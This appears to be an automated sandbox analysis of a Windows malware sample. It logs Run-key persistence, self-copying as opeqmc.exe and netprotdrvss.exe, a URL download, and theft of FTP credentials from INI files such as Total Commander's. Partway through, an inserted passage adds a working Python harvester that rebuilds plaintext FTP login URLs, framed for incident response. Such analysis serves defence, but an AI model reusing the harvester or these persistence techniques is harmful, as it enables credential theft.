                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                  • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                  • Sleep.KERNEL32(00002710), ref: 0040B3F7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                  • ExitProcess.KERNEL32 ref: 0040B44D
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC72
                  • GetLastError.KERNEL32(00000004), ref: 0040B48D
                  • GetLastError.KERNEL32(00000004), ref: 0040B49A
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                  • GetLastError.KERNEL32(00000004), ref: 0040B500
                  Strings
                  Similarity
                  • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                  • API String ID: 3692109554-477663111
                  • Opcode ID: 135f96d597183bf12dff870bffbdb7f9defbeb34ee59089557ae340a53569a7b
                  • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                  • Opcode Fuzzy Hash: 135f96d597183bf12dff870bffbdb7f9defbeb34ee59089557ae340a53569a7b
                  • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF
                  APIs
                  • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC44
                  • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC72
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  Strings
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                  • API String ID: 3546245721-4228964922
                  • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                  • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779
                  APIs
                  • GetCommandLineW.KERNEL32 ref: 0040AB0A
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000820), ref: 0040AB44
                  • CharLowerW.USER32(?), ref: 0040AB57
                  • CharLowerW.USER32(?), ref: 0040AB60
                  Strings
                  Similarity
                  • API ID: CharLower$CommandFileLineModuleName
                  • String ID: /nomove
                  • API String ID: 1338073227-1111986840
                  • Opcode ID: f64901d43a542e62caf56568754323496182aa7e159d48bf7f08474787536f84
                  • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                  • Opcode Fuzzy Hash: f64901d43a542e62caf56568754323496182aa7e159d48bf7f08474787536f84
                  • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,74DF0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                  • GetLastError.KERNEL32(00000004), ref: 004077A9
                    • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004075FC
                    • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  Similarity
                  • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                  • String ID:
                  • API String ID: 1536607067-0
                  • Opcode ID: a1b258860002bc12c08fbd9961b7a6ab8b05c7ecdd508c99b624503958201486
                  • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                  • Opcode Fuzzy Hash: a1b258860002bc12c08fbd9961b7a6ab8b05c7ecdd508c99b624503958201486
                  • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B
                  APIs
                  • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                  • RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  Strings
                  Similarity
                  • API ID: CloseQueryValue
                  • String ID: w,@
                  • API String ID: 3356406503-3776089593
                  • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                  • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14
                  APIs
                  • _memset.LIBCMT ref: 00407800
                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0040781B
                  Similarity
                  • API ID: CreateProcess_memset
                  • String ID:
                  • API String ID: 1177741608-0
                  • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                  • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,00020002), ref: 00403A09
                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                  • RtlAllocateHeap.NTDLL(00000008,00000C0C), ref: 00403A55
                  • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                  • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                  Strings
                  Similarity
                  • API ID: PrivateProfileString$AllocateHeap
                  • String ID: connections$default$ftp://%s:%s@%s$host$password$username
                  • API String ID: 1411386233-3902919163
                  • Opcode ID: df4bb6539310a0437bdb3c8e886131dc25bb36a28de64beaddf8d5a507c10e60
                  • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                  • Opcode Fuzzy Hash: df4bb6539310a0437bdb3c8e886131dc25bb36a28de64beaddf8d5a507c10e60
                  • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58
                  APIs
                    • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?), ref: 00406A8C
                    • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,?,?,?,004032CE), ref: 00406B2A
                  • GetSystemMetrics.USER32(00000000), ref: 004032E5
                  • GetSystemMetrics.USER32(00000001), ref: 004032ED
                  • VirtualProtect.KERNEL32(75C50B80,0000000A,00000008,?), ref: 00403309
                  • VirtualProtect.KERNEL32(75C50B88,0000000A,?,?), ref: 00403333
                  • SetUnhandledExceptionFilter.KERNEL32(004032AF), ref: 0040333A
                  • LoadLibraryW.KERNEL32(atl), ref: 00403345
                  • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                  • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                  • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                  Strings
                  Similarity
                  • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                  • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                  • API String ID: 3066332896-2664446222
                  • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                  • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                  • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                  • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                  APIs
                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000), ref: 0040823C
                  • RtlAllocateHeap.NTDLL(00000008,00020002), ref: 00403566
                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                  • RtlAllocateHeap.NTDLL(00000008,00000C20), ref: 004035B5
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                  • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403681
                  Strings
                  Similarity
                  • API ID: PrivateProfile$String$AllocateHeap$CombinePath
                  • String ID: ftp://%s:%s@%s:%u$pass$port$user
                  • API String ID: 3333933401-2696999094
                  • Opcode ID: 5e129ef3ac38fdb4bd7dae3a7c765ce8d020abefe488821008289a7ec09e8bcb
                  • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                  • Opcode Fuzzy Hash: 5e129ef3ac38fdb4bd7dae3a7c765ce8d020abefe488821008289a7ec09e8bcb
                  • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
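The two GetPrivateProfileStringW routines above (the one with the connections/default/host/password/username strings and the one with user/pass/port) read FTP credentials out of INI-style client configuration files: each first calls GetPrivateProfileStringW with a NULL section name, which returns the list of section names, then walks the sections pulling the host, account and password and formats them as "ftp://%s:%s@%s" or "ftp://%s:%s@%s:%u", the latter with GetPrivateProfileIntW defaulting the port to 0x15, i.e. 21. The following is an added example, not code from the report or the sample; it models those Win32 semantics (case-insensitive section and key lookup, the caller's default for a missing key) and applies both layouts to a constructed INI file. Assumptions: for the second layout the section name is taken as the host, since the report shows no host key for it, and the StrStrIW filtering in the first routine is not reproduced because the report does not show what it compares. No particular client's file format is implied.

```python
"""Model of the INI credential harvest, with a redaction helper for triage (added example)."""
import re
from typing import Dict, List, Optional

Ini = Dict[str, Dict[str, str]]

# Constructed sample; not any real client's configuration file.
SAMPLE_INI = """\
; constructed sample
[Connections]
count=2

[Connections.site1]
Host=ftp.example.test
Username=alice
Password=s3cret

[backup.example.test]
User=bob
Pass=hunter2
Port=2121

[mirror.example.test]
User=carol
Pass=pw
"""


def load_ini(text: str) -> Ini:
    """Minimal INI parser; section and key names are lowercased for case-insensitive lookup."""
    sections: Ini = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line[0] == "[" and line[-1] == "]":
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def section_names(ini: Ini) -> List[str]:
    """GetPrivateProfileString(NULL, NULL, ...): the section names, in file order."""
    return list(ini)


def get_string(ini: Ini, app: str, key: str, default=""):
    """GetPrivateProfileString: the value, or the caller's default when absent."""
    return ini.get(app.lower(), {}).get(key.lower(), default)


def get_int(ini: Ini, app: str, key: str, default: int) -> int:
    """GetPrivateProfileInt: default when the key is absent, leading digits otherwise (0 if none)."""
    value = get_string(ini, app, key, None)
    if value is None:
        return default
    m = re.match(r"\s*[+-]?\d+", value)
    return int(m.group()) if m else 0


def harvest_ftp(ini: Ini) -> List[str]:
    """Apply both key layouts seen in the sample's string tables to every section."""
    urls = []
    for sec in section_names(ini):
        host = get_string(ini, sec, "host")
        if host:                                   # layout 1: host/username/password
            urls.append("ftp://%s:%s@%s" % (get_string(ini, sec, "username"),
                                            get_string(ini, sec, "password"), host))
            continue
        user = get_string(ini, sec, "user")
        if user:                                   # layout 2: user/pass/port, host = section (assumed)
            urls.append("ftp://%s:%s@%s:%d" % (user, get_string(ini, sec, "pass"),
                                               sec, get_int(ini, sec, "port", 0x15)))
    return urls


def redact(url: str) -> str:
    """Mask the password so a triage report can list exposed accounts without the secrets."""
    return re.sub(r"^(ftp://[^:/]*:)[^@]*@", r"\1***@", url)
```

During incident response, run harvest_ftp() over the same configuration files on an affected host and report the redact()ed URLs: every account listed must be treated as exposed and rotated, because the sample formats the plaintext credentials for exfiltration exactly this way.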
                  APIs
                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000), ref: 0040823C
                  • FindFirstFileW.KERNEL32(?,?), ref: 00408280
                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                  • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                  • Sleep.KERNEL32(00000000), ref: 00408342
                  • Sleep.KERNEL32(00000000), ref: 00408377
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                  • FindClose.KERNEL32(00000000), ref: 004083B9
                  Strings
                  Similarity
                  • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                  • String ID: 5@$5@$.$.
                  • API String ID: 2348139788-1020649804
                  • Opcode ID: 4fc783ec1a5d9276aeedd160a7c130a666ca6b6505fadcd079d5b28b90bd0463
                  • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                  • Opcode Fuzzy Hash: 4fc783ec1a5d9276aeedd160a7c130a666ca6b6505fadcd079d5b28b90bd0463
                  • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                  APIs
                  • DeleteFileW.KERNEL32(?,74DF0F00), ref: 00407043
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                  • GetLastError.KERNEL32(00000000), ref: 00407079
                  • SetEndOfFile.KERNEL32(?), ref: 0040708F
                  • InternetOpenUrlW.WININET(?,?,00000000,80000000,00000000,00000000), ref: 004070A9
                  • CloseHandle.KERNEL32(?), ref: 004070BB
                  Similarity
                  • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                  • String ID:
                  • API String ID: 3711279109-0
                  • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                  • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                  • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                  • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                  Strings
                  Similarity
                  • API ID:
                  • String ID: &condition_id=$&kwtype=$&real_refer=%s$&ref=%s$&ref=%s&real_refer=%s$0$0$0$0
                  • API String ID: 0-2992689389
                  • Opcode ID: a727e907e4fa3dcf0a7e47aeb1b7c58c319b6e169d55fc458ead9a64ed98c1b2
                  • Instruction ID: e592e17ffd072e5ed7288f56bd6294cd549ee2c695a1c784d027d9705cc039a8
                  • Opcode Fuzzy Hash: a727e907e4fa3dcf0a7e47aeb1b7c58c319b6e169d55fc458ead9a64ed98c1b2
                  • Instruction Fuzzy Hash: B2F1E272810118AADB14EB61DC919EF737EEF01304F5044BBFA09B62D1E7789E858F99
                  APIs
                  • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                  • GetLocalTime.KERNEL32(?), ref: 004074B3
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 3777474486-0
                  • Opcode ID: bce84979032c395480666c2d60b9174811821601ee86a2001902def64962fbd3
                  • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                  • Opcode Fuzzy Hash: bce84979032c395480666c2d60b9174811821601ee86a2001902def64962fbd3
                  • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                  APIs
                  • GetSystemTime.KERNEL32(?,00000000,?), ref: 0040727C
                  • SystemTimeToFileTime.KERNEL32(?,?,00000000,?), ref: 004072C1
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                  • __aulldiv.LIBCMT ref: 004072E3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID:
                  • API String ID: 3735792614-0
                  • Opcode ID: 0c4dc03f5a347e2c27f051dc2031945d9a04d2897cd941f14c1bc42406c11d92
                  • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                  • Opcode Fuzzy Hash: 0c4dc03f5a347e2c27f051dc2031945d9a04d2897cd941f14c1bc42406c11d92
                  • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 00406CCF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
                  • Opcode ID: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
                  • Instruction ID: 5612040357c07126fa19026aaffe8c4f09115318cb9d2fe7a616e1c4ae3a2977
                  • Opcode Fuzzy Hash: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
                  • Instruction Fuzzy Hash: C9E04FB2D4011D5BDB1C9B60EE47BD9BBF8EB11304F0140E6D746E5180E6B8DB848F95
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
                  • Instruction ID: 218ff2483168da8b183dc8d255f139c90e55d0551e3cd34b08f9c15d5f680e8f
                  • Opcode Fuzzy Hash: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
                  • Instruction Fuzzy Hash: FB423CB6E413099FDB08CFD6D8C09DCB7B3FFD8314B1A91A9C505A7316D6B87A068A50
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 0040B103
                  • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                  • GetLastError.KERNEL32(00000004), ref: 0040B188
                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                  • String ID: \netprotdrvss.exe$begun.ru
                  • API String ID: 2887986221-2660752650
                  • Opcode ID: f00215b0a2c050b351c75e946f92b6e3bcf83530ecbb64207e8b54d6640c664f
                  • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                  • Opcode Fuzzy Hash: f00215b0a2c050b351c75e946f92b6e3bcf83530ecbb64207e8b54d6640c664f
                  • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
                  APIs
                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                    • Part of subcall function 004039EA: RtlAllocateHeap.NTDLL(00000008,00020002), ref: 00403A09
                    • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                    • Part of subcall function 004039EA: RtlAllocateHeap.NTDLL(00000008,00000C0C), ref: 00403A55
                    • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                    • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                    • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                  • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: Heap$AllocateEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                  • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                  • API String ID: 1603279786-3914982127
                  • Opcode ID: 26c8f4bebab1ae11d82167087f32e99de9e525031e1043edf7ba74d8e218de96
                  • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                  • Opcode Fuzzy Hash: 26c8f4bebab1ae11d82167087f32e99de9e525031e1043edf7ba74d8e218de96
                  • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65
                  APIs
                  • OleInitialize.OLE32(00000000), ref: 004027F5
                    • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                    • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: Internet$InitializeOpenOption
                  • String ID: From: true
                  • API String ID: 1176259655-9585188
                  • Opcode ID: e3ed93f08a692b048133c282a57554ffb430715b37394e79d1082c6afb7cb1c7
                  • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                  • Opcode Fuzzy Hash: e3ed93f08a692b048133c282a57554ffb430715b37394e79d1082c6afb7cb1c7
                  • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9
                  APIs
                    • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                  • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                  • GetLastError.KERNEL32(?), ref: 00402F4E
                  • GetLastError.KERNEL32 ref: 00403237
                  • GetLastError.KERNEL32(?), ref: 00403258
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
